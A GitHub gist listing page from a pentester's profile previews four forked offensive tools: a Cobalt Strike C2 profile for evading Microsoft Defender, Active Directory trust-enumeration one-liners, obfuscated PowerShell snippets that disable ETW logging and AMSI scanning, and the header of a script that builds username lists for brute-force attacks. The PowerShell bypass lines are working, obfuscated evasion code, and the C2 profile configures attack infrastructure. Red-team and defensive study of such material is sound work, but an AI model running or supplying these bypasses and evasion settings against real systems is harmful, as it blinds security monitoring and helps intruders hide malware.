Mr. Niko 0xMrNiko
0xMrNiko
/ minimal-defender-bypass.profile
Created
August 24, 2022 16:27
— forked from tothi/minimal-defender-bypass.profile
Minimal Cobalt Strike C2 Profile for Bypassing Defender
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # in addition to the profile, a stage0 loader is also required (default generated payloads are caught by signatures) | |
| # as stage0, remote injecting a thread into a suspended process works | |
| set host_stage "false"; | |
| set useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 Edg/96.0.1054.62"; | |
| set sleeptime "10000"; | |
| stage { | |
| set allocator "MapViewOfFile"; | |
| set name "notevil.dll"; |
0xMrNiko
/ 1) Active Directory One Liners
Created
August 6, 2022 13:25
— forked from w00tc/1) Active Directory One Liners
Some Pentesting Notes
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Retrieves all of the trust relationships for this domain - Does not Grab Forest Trusts | |
| ([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships() | |
| Grab Forest Trusts. | |
| ([System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest()).GetAllTrustRelationships() | |
0xMrNiko
/ powershell-bypasses.ps1
Created
July 30, 2022 12:21
— forked from reigningshells/powershell-bypasses.ps1
Random PowerShell Bypasses
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Logging bypass: | |
| (({}).gettype())."aSs`emblY"."Getty`PE"(('System.Manage'+'ment.Automati'+'on.Trac'+'ing.P'+'SEtwL'+'og'+'Pro'+'vi'+'d'+'e'+'r'))."gEtf`ieLD"(('etwProvi'+'de'+'r'),('Non'+'P'+'ublic,Static'))."Se`TVAL`Ue"($null,(New-Object System.Diagnostics.Eventing.EventProvider(New-Guid))) | |
| # AMSI Bypass (old, burned) | |
| sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System' ) )."g`etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} ) | |
| # New AMSI bypass obfuscation: |
0xMrNiko
/ namemash.py
Created
July 17, 2022 09:25
— forked from superkojiman/namemash.py
Creating a user name list for brute force attacks.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| ''' | |
| NameMash by superkojiman | |
| Generate a list of possible usernames from a person's first and last name. | |
| https://blog.techorganic.com/2011/07/17/creating-a-user-name-list-for-brute-force-attacks/ | |
| ''' |